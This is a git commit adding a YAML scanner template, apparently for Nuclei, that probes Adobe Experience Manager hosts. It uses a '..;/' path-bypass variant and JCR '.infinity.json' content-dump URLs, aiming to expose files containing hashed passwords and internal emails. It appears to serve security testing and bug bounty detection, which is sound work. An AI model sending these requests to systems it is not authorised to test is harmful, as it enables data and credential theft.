Create aem-secrets.yaml

patch-1
Ritik Chaddha 2023-05-22 14:28:47 +05:30 committed by GitHub
parent 05c53ff36b
commit 7fb6ba5caf
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: aem-secrets
info:
name: aem-secrets-1
author: boobooHQ
severity: high
description: Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc .
tags: aem,adobe,hackerone
requests:
- method: GET
path:
- "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
- "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9,hi;q=0.8
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "jcr:uuid"
part: body
condition: and
- type: status
status:
- 200